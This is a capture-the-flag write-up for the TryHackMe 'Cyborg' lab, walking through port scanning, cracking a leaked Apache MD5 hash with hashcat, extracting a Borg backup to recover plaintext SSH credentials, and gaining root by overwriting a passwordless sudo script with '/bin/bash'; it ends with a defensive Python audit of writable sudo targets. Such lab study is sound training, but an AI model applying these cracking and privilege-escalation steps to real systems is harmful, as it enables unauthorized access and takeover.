
[TryHackMe] Cyborg #Writeup


Scan the machine, how many ports are open?

Port scan the target with nmap.

$ nmap 10.10.122.206

Starting Nmap 7.60 ( https://nmap.org ) at 2024-07-18 03:00 BST
Nmap scan report for ip-10-10-122-206.eu-west-1.compute.internal (10.10.122.206)
Host is up (0.0013s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 02:36:EF:6D:3F:FB (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.80 seconds

2

What service is running on port 22?

ssh

What service is running on port 80?

http

What is the user.txt flag?

Since HTTP is open, access it in a browser.
The Apache2 default page was displayed.

Search for hidden directories with gobuster.

$ gobuster dir -u http://10.10.122.206 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.122.206
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2024/07/18 03:03:39 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/admin (Status: 301)
/etc (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2024/07/18 03:03:40 Finished
===============================================================

Accessing /etc revealed a squid directory.
Under the squid directory there were the following two files.

passwd
music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
squid.conf
auth_param basic program /usr/lib64/squid/basic_ncsa_auth /etc/squid/passwd
auth_param basic children 5
auth_param basic realm Squid Basic Authentication
auth_param basic credentialsttl 2 hours
acl auth_users proxy_auth REQUIRED
http_access allow auth_users

Accessing /admin showed the following text.

My music acheivements to remind me I'm cool

Setup
My name is Alex and im a music producer from The United Kingdom!
This is my office!!!

Childhood
For my entire childhood i knew i wanted to be a music artist.
I started playing the Piano at age 5.

Exploring further, I found /admin/admin.html.

Admin Shoutbox

############################################
############################################
[Yesterday at 4.32pm from Josh]
Are we all going to watch the football game at the weekend??
############################################
############################################
[Yesterday at 4.33pm from Adam]
Yeah Yeah mate absolutely hope they win!
############################################
############################################
[Yesterday at 4.35pm from Josh]
See you there then mate!
############################################
############################################
[Today at 5.45am from Alex]
Ok sorry guys i think i messed something up, uhh i was playing around with the squid proxy i mentioned earlier.
I decided to give up like i always do ahahaha sorry about that.
I heard these proxy things are supposed to make your website secure but i barely know how to use it so im probably making it more insecure in the process.
Might pass it over to the IT guys but in the meantime all the config files are laying about.
And since i dont know how it works im not sure how to delete them hope they don't contain any confidential information lol.
other than that im pretty sure my backup "music_archive" is safe just to confirm.
############################################
############################################

Also, a compressed file called archive.tar could be downloaded from /admin/archive.tar.

ls
config  data  hints.5  index.5  integrity.5  nonce  README

data is a directory containing files.
Read the README.

README
This is a Borg Backup repository.
See https://borgbackup.readthedocs.io/

Borg Backup is apparently a deduplicating backup program.

Install borgbackup.

$ sudo apt install borgbackup

Try to restore the backup.
First, check the archive name with borg list, then restore it with borg extract.

Run borg list.

$ borg list /root/home/field/dev/final_archive
Enter passphrase for key /root/home/field/dev/final_archive: 

I was asked for a passphrase.
This entry in /etc/squid/passwd looks suspicious.

music_archive:$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.

However, it is hashed.

Searching the hashcat wiki for "$apr1$" shows that this format is MD5-based (Apache md5apr1).
The hash mode is 1600.

Create a file called passwd and write "$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn." into it.

$ nano passwd

Crack the password with hashcat.

$ hashcat -m 1600 passwd /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1-66-g6a419d06) starting...

* Device #2: Outdated POCL OpenCL driver detected!

This OpenCL driver has been marked as likely to fail kernel compilation or to produce false negatives.
You can use --force to override this, but do not report related errors.

OpenCL API (OpenCL 1.2 LINUX) - Platform #1 [Intel(R) Corporation]
==================================================================
* Device #1: AMD EPYC 7571, 3832/3896 MB (974 MB allocatable), 2MCU

OpenCL API (OpenCL 1.2 pocl 1.1 None+Asserts, LLVM 6.0.0, SPIR, SLEEF, DISTRO, POCL_DEBUG) - Platform #2 [The pocl project]
===========================================================================================================================
* Device #2: pthread-AMD EPYC 7571, skipped

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 0 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 14344384
* Runtime...: 11 secs

$apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.:squidward  
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Apache $apr1$ MD5, md5apr1, MD5 (APR)
Hash.Target......: $apr1$BpZ.Q.1m$F0qqPwHSOG50URuOVQTTn.
Time.Started.....: Thu Jul 18 03:52:24 2024 (10 secs)
Time.Estimated...: Thu Jul 18 03:52:34 2024 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     4149 H/s (7.75ms) @ Accel:128 Loops:125 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 39168/14344384 (0.27%)
Rejected.........: 0/39168 (0.00%)
Restore.Point....: 38912/14344384 (0.27%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:875-1000
Candidates.#1....: toutou -> luvhim

Started: Thu Jul 18 03:51:16 2024
Stopped: Thu Jul 18 03:52:35 2024

Try restoring the backup again with this password.

$ borg list /root/home/field/dev/final_archive
Enter passphrase for key /root/home/field/dev/final_archive: 
music_archive                        Tue, 2020-12-29 14:00:38 [f789ddb6b0ec108d130d16adebf5713c29faf19c44cad5e1eeb8ba37277b1c82]
$ borg extract /root/home/field/dev/final_archive::music_archive
Enter passphrase for key /root/home/field/dev/final_archive: 

It worked. A directory called alex was created under home.
The contents of alex looked like this.

$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos

The directories contained the following files.

Desktop/secret.txt
shoutout to all the people who have gotten to this stage whoop whoop!"
Documents/note.txt
Wow I'm awful at remembering Passwords so I've taken my Friends advice and noting them down!

alex:S3cretP@s3

Alex's password is helpfully written down, so I'll use it.

$ ssh alex@10.10.122.206
The authenticity of host '10.10.122.206 (10.10.122.206)' can't be established.
ECDSA key fingerprint is SHA256:uB5ulnLcQitH1NC30YfXJUbdLjQLRvGhDRUgCSAD7F8.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.122.206' (ECDSA) to the list of known hosts.
alex@10.10.122.206's password: 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.15.0-128-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


27 packages can be updated.
0 updates are security updates.


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

alex@ubuntu:~$ ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  user.txt  Videos
alex@ubuntu:~$ cat user.txt
flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}

The SSH connection succeeded and I got user.txt!

flag{1_hop3_y0u_ke3p_th3_arch1v3s_saf3}

What is the root.txt flag?

Finally, aim for privilege escalation.

$ sudo -l
Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh

backup.sh looks usable.
Change its permissions to 777.

$ chmod 777 /etc/mp3backups/backup.sh

Replace its contents with a script for privilege escalation.

$ echo "/bin/bash" > /etc/mp3backups/backup.sh

Run backup.sh.

$ sudo /etc/mp3backups/backup.sh
$ whoami
root
$ ls /root
root.txt

Found root.txt.
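The root cause of this escalation is a sudo NOPASSWD entry pointing at a file the invoking user can rewrite. The following is an added example (not part of the writeup) of a defender-side audit: it parses `sudo -l` output of the shape shown above and flags NOPASSWD targets that are not root-owned, are group/world-writable, or sit in a directory others can write to. The sample `sudo -l` text is constructed, and the function names are my own.

```python
import os
import re
import stat

# Constructed sample modelled on the writeup's `sudo -l` output.
SUDO_L_OUTPUT = """\
Matching Defaults entries for alex on ubuntu:
    env_reset, mail_badpass

User alex may run the following commands on ubuntu:
    (ALL : ALL) NOPASSWD: /etc/mp3backups/backup.sh
    (root) /usr/bin/apt-get update
"""

# One sudoers entry as printed by `sudo -l`: "(runas) [TAG: ...] /path/to/cmd [args]"
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>\S+)")


def nopasswd_commands(sudo_l_text):
    """Return the command paths sudo will run without asking for a password."""
    cmds = []
    for line in sudo_l_text.splitlines():
        m = ENTRY_RE.match(line)
        if m and "NOPASSWD:" in m.group("tags"):
            cmds.append(m.group("cmd"))
    return cmds


def mode_findings(st_uid, st_mode):
    """Pure check on ownership/permission bits; returns a list of problems."""
    findings = []
    if st_uid != 0:
        findings.append("owned by uid %d, not root" % st_uid)
    if st_mode & stat.S_IWGRP:
        findings.append("group-writable")
    if st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    return findings


def writable_by_non_root(path):
    """Reasons a non-root user could change what sudo executes at `path`."""
    try:
        st = os.stat(path)  # follows symlinks, as sudo's exec would
    except FileNotFoundError:
        return ["missing (a user could create it)"]
    findings = mode_findings(st.st_uid, st.st_mode)
    parent = os.stat(os.path.dirname(path) or ".")
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        findings.append("parent directory world-writable without sticky bit")
    return findings


def audit(sudo_l_text):
    """Map each NOPASSWD command to its findings; an empty list means it is safe."""
    return {cmd: writable_by_non_root(cmd) for cmd in nopasswd_commands(sudo_l_text)}
```

Run `audit(SUDO_L_OUTPUT)` on the target as the low-privileged user; a `chmod 777` like the one above shows up as both "group-writable" and "world-writable".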
